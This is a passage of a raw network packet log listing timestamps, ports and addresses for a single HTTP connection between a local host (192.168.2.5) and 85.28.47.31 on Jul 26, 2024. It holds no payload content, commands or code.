Jul 26, 2024 20:09:11.032190084 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.032195091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.032203913 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.032210112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.032218933 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.032226086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.032233953 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.032252073 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.032269001 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.032947063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.032963037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.032979012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.032994032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.032996893 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.033009052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.033011913 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.033030987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.033031940 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.033040047 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.033046007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.033061981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.033071041 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.033077002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.033092022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.033093929 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.033107042 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.033116102 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.033123016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.033137083 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.033140898 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.033159018 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.033181906 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.033711910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.033729076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.033744097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.033751965 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.033760071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.033772945 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.033775091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.033786058 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.033799887 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.033816099 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.111169100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.111243010 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.111249924 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.111253977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.111290932 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.111690044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.111700058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.111738920 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.115149975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.115183115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.115192890 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.115216970 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.115253925 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.115396023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.115406036 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.115416050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.115447044 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.115474939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.115475893 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.115485907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.115495920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.115518093 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.115545034 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.115684986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.115695000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.115704060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.115714073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.115729094 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.115803957 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.115804911 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.115849972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.115860939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.115869999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.115875006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.115885973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.115891933 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.115919113 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.115953922 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.116240978 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.116256952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.116266966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.116276979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.116277933 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.116286993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.116312027 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.116333008 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.116348982 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.116384983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.116394997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.116404057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.116414070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.116430998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.116431952 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.116441011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.116446018 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.116447926 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.116473913 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.116519928 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.117284060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.117294073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.117300987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.117305040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.117336035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.117338896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.117346048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.117357016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.117362976 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.117367029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.117448092 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.117449045 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.117899895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.117909908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.117918968 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.117928982 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.117960930 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.117981911 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.117988110 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.117991924 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.118001938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.118025064 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.118027925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.118037939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.118045092 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.118046999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.118057013 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.118067980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.118077040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.118086100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.118092060 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.118094921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.118102074 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.118105888 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.118129969 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.118164062 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.118222952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.118233919 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.118269920 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.118292093 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.118294001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.118304014 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.118313074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.118323088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.118333101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.118336916 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.118344069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.118345976 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.118381023 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.118395090 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.119018078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.119026899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.119074106 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.119101048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.119110107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.119119883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.119129896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.119138956 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.119148970 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.119148970 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.119159937 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.119159937 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.119168997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.119194031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.119216919 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.119259119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.119267941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.119277000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.119287014 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.119296074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.119302988 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.119307041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.119316101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.119323969 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.119327068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.119359016 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.119378090 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.149173021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.149218082 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.149228096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.149250984 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.149391890 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.149400949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.149411917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.149421930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.149422884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.149461985 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.149461985 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.149684906 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.149694920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.149703979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.149714947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.149724007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.149732113 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.149734020 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.149744034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.149754047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.149755955 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.149775028 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.149800062 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.150321007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.150331020 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.150340080 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.150350094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.150358915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.150368929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.150369883 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.150379896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.150389910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.150392056 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.150401115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.150409937 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.150413990 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.150420904 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.150429964 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.150430918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.150441885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.150458097 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.150475979 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.151382923 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.151391983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.151401997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.151412964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.151431084 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.151457071 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.217591047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.217602015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.217612028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.217694998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.217700005 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.217704058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.217714071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.217740059 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.217749119 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.217772007 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.217900991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.217911959 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.217921972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.217932940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.217946053 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.217976093 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.218311071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.218321085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.218332052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.218341112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.218352079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.218358040 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.218362093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.218370914 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.218372107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.218383074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.218401909 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.218430996 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.218595028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.218652010 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.218759060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.218770027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.218777895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.218787909 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.218796968 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.218801022 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.218806982 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.218816042 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.218826056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.218832016 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.218837023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.218844891 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.218847990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.218857050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.218869925 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.218869925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.218887091 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.218903065 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.218924999 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.219635963 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.219645023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.219655037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.219665051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.219675064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.219681978 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.219683886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.219693899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.219702959 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.219705105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.219717026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.219727993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.219731092 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.219738960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.219747066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.219750881 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.219758987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.219777107 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.220005035 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.220568895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.220580101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.220588923 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.220597982 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.220613956 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.220622063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.220628023 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.220632076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.220637083 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.220642090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.220650911 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.220658064 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.220659018 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.220668077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.220678091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.220679998 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.220685959 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.220696926 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.220699072 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.220706940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.220729113 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.220752954 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.221465111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.221476078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.221486092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.221496105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.221504927 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.221510887 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.221514940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.221524000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.221534014 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.221539021 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.221544027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.221550941 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.221554995 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.221565008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.221570969 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.221575022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.221584082 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.221590042 CEST	49704	80	192.168.2.5	85.28.47.31
